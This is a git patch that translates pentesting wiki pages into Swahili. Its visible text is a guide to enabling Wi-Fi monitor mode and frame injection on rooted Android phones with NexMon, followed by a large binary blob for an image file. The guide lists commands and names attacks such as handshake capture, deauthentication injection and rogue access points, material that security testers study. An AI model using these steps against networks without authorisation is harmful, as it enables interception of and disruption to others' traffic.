From fc4b571e16a228ed76adacce9d524a141d54c7b9 Mon Sep 17 00:00:00 2001 From: Translator Date: Tue, 15 Jul 2025 17:14:46 +0000 Subject: [PATCH] Translated ['src/generic-methodologies-and-resources/pentesting-wifi/ena --- ...nexmon-monitor-and-injection-on-android.md | 22 +-- src/images/discount.jpeg | Bin 0 -> 190848 bytes .../android-app-pentesting/README.md | 172 +++++++++--------- .../shizuku-privileged-api.md | 30 +-- .../ios-pentesting-without-jailbreak.md | 48 ++--- .../pentesting-telnet.md | 32 ++-- .../less-code-injection-ssrf.md | 20 +- .../ssrf-vulnerable-platforms.md | 2 +- .../ad-information-in-printers.md | 10 +- 9 files changed, 168 insertions(+), 168 deletions(-) create mode 100644 src/images/discount.jpeg diff --git a/src/generic-methodologies-and-resources/pentesting-wifi/enable-nexmon-monitor-and-injection-on-android.md b/src/generic-methodologies-and-resources/pentesting-wifi/enable-nexmon-monitor-and-injection-on-android.md index 287f472cc..4c366f93e 100644 --- a/src/generic-methodologies-and-resources/pentesting-wifi/enable-nexmon-monitor-and-injection-on-android.md +++ b/src/generic-methodologies-and-resources/pentesting-wifi/enable-nexmon-monitor-and-injection-on-android.md @@ -3,20 +3,20 @@ {{#include ../../banners/hacktricks-training.md}} ## Muhtasari -Simu nyingi za kisasa za Android zina chip ya Wi-Fi ya Broadcom/Cypress ambayo inakuja bila uwezo wa 802.11 monitor mode au frame-injection. Mfumo wa wazi wa NexMon unarekebisha firmware ya miliki ili kuongeza vipengele hivyo na kuviweka wazi kupitia maktaba ya pamoja (`libnexmon.so`) na msaidizi wa CLI (`nexutil`). Kwa kuingiza maktaba hiyo kwenye dereva wa Wi-Fi wa kawaida, kifaa kilichopandishwa haki kinaweza kukamata trafiki ya 802.11 na kuingiza fremu zisizo na mipaka – kuondoa hitaji la adapter ya USB ya nje. +Simu nyingi za kisasa za Android zina chip ya Wi-Fi ya Broadcom/Cypress ambayo inakuja bila uwezo wa monitor mode wa 802.11 au frame-injection. Mfumo wa wazi wa NexMon unarekebisha firmware ya miliki ili kuongeza vipengele hivyo na kuviweka wazi kupitia maktaba ya pamoja (`libnexmon.so`) na msaidizi wa CLI (`nexutil`). Kwa kuingiza maktaba hiyo kwenye dereva wa Wi-Fi wa kawaida, kifaa kilichopandishwa haki kinaweza kukamata trafiki ya 802.11 na kuingiza frames zisizo na mipaka – kuondoa hitaji la adapter ya USB ya nje. Ukurasa huu unadokeza mchakato wa haraka unaotumia Samsung Galaxy S10 iliyorekebishwa kikamilifu (BCM4375B1) kama mfano, ukitumia: * Moduli ya NexMon Magisk inayojumuisha firmware iliyorekebishwa + `libnexmon.so` * Programu ya Hijacker ya Android ili kuharakisha kubadilisha monitor-mode -* Kali NetHunter chroot ya hiari ili kukimbia zana za kawaida za wireless (aircrack-ng, wifite, mdk4 …) moja kwa moja dhidi ya kiunganishi cha ndani +* Kali NetHunter chroot ya hiari ili kukimbia zana za kawaida za wireless (aircrack-ng, wifite, mdk4 …) moja kwa moja dhidi ya interface ya ndani Teknolojia hiyo hiyo inatumika kwa simu yoyote ambayo ina patch ya NexMon inayopatikana hadharani (Pixel 1, Nexus 6P, Galaxy S7/S8, n.k.). --- ## Masharti -* Simu ya Android yenye chip ya Broadcom/Cypress inayoungwa mkono (mfano: BCM4358/59/43596/4375B1) +* Simu ya Android yenye chipset ya Broadcom/Cypress inayoungwa mkono (mfano: BCM4358/59/43596/4375B1) * Root na Magisk ≥ 24 * BusyBox (ROM nyingi/NetHunter tayari zinajumuisha) * NexMon Magisk ZIP au patch iliyojitengeneza inayotoa: @@ -58,12 +58,12 @@ Ikiwa Hijacker inaonyesha makosa wakati wa uzinduzi, tengeneza saraka inayohitaj mkdir -p /storage/emulated/0/Hijacker ``` ### What do those `nexutil` flags mean? -* **`-s0x613`** Andika variable ya firmware 0x613 (FCAP_FRAME_INJECTION) → `1` (wezesha TX ya frames za kawaida). -* **`-i`** Weka interface katika hali ya monitor (kichwa cha radiotap kitaongezwa). +* **`-s0x613`** Andika variable ya firmware 0x613 (FCAP_FRAME_INJECTION) → `1` (wezesha TX ya fremu za kawaida). +* **`-i`** Weka interface katika hali ya ufuatiliaji (kichwa cha radiotap kitaongezwa). * **`-v2`** Weka kiwango cha maelezo; `2` inachapisha uthibitisho na toleo la firmware. * **`-m0`** Rejesha hali ya usimamizi (inayotumika katika amri ya *disable*). -Baada ya kuendesha *Enable monitor mode* unapaswa kuona interface katika hali ya monitor na uweze kukamata frames za raw na: +Baada ya kuendesha *Enable monitor mode* unapaswa kuona interface katika hali ya ufuatiliaji na uweze kukamata fremu za kawaida kwa: ```bash airodump-ng --band abg wlan0 ``` @@ -84,12 +84,12 @@ Ikiwa unahitaji tu sniffing ya passively, acha bendera `-s0x613`. ## Kutumia `libnexmon` ndani ya Kali NetHunter / chroot Zana za kawaida za mtumiaji katika Kali hazijui kuhusu NexMon, lakini unaweza kuzilazimisha kuzitumia kupitia `LD_PRELOAD`: -1. Nakili kitu kilichojengwa tayari ndani ya chroot: +1. Nakili kituo kilichojengwa tayari ndani ya chroot: ```bash cp /sdcard/Download/kalilibnexmon.so /lib/ ``` 2. Wezesha hali ya ufuatiliaji kutoka kwa **Android host** (amri hapo juu au kupitia Hijacker). -3. Anzisha chombo chochote cha wireless ndani ya Kali na preload: +3. Anzisha zana yoyote ya wireless ndani ya Kali na preload: ```bash sudo su export LD_PRELOAD=/lib/kalilibnexmon.so @@ -102,13 +102,13 @@ Kwa sababu firmware tayari inashughulikia kuingiza radiotap, zana za mtumiaji zi --- ## Mashambulizi ya Kawaida Yanayowezekana -Mara tu monitor + TX inapoanzishwa unaweza: +Mara tu hali ya ufuatiliaji + TX inapoanzishwa unaweza: * Kukamata WPA(2/3-SAE) handshakes au PMKID kwa kutumia `wifite`, `hcxdumptool`, `airodump-ng`. * Kuingiza frames za kuondoa uthibitisho / kutenganisha ili kulazimisha wateja kuungana tena. * Kuunda frames za usimamizi/data za kiholela kwa kutumia `mdk4`, `aireplay-ng`, Scapy, nk. -* Kujenga AP za uasi au kufanya mashambulizi ya KARMA/MANA moja kwa moja kutoka kwa simu. +* Kujenga AP za uasi au kufanya mashambulizi ya KARMA/MANA moja kwa moja kutoka kwenye simu. -Utendaji kwenye Galaxy S10 ni sawa na NIC za USB za nje (~20 dBm TX, 2-3 M pps RX). +Utendaji kwenye Galaxy S10 ni sawa na NICs za USB za nje (~20 dBm TX, 2-3 M pps RX). --- diff --git a/src/images/discount.jpeg b/src/images/discount.jpeg new file mode 100644 index 0000000000000000000000000000000000000000..5c0b098d4f9f02bc2e1c44caccc70f30ea0eca4a GIT binary patch literal 190848 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%0AtmyzU$o8=(-vy*6J}0uGK-8lWP$tI2I(n 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 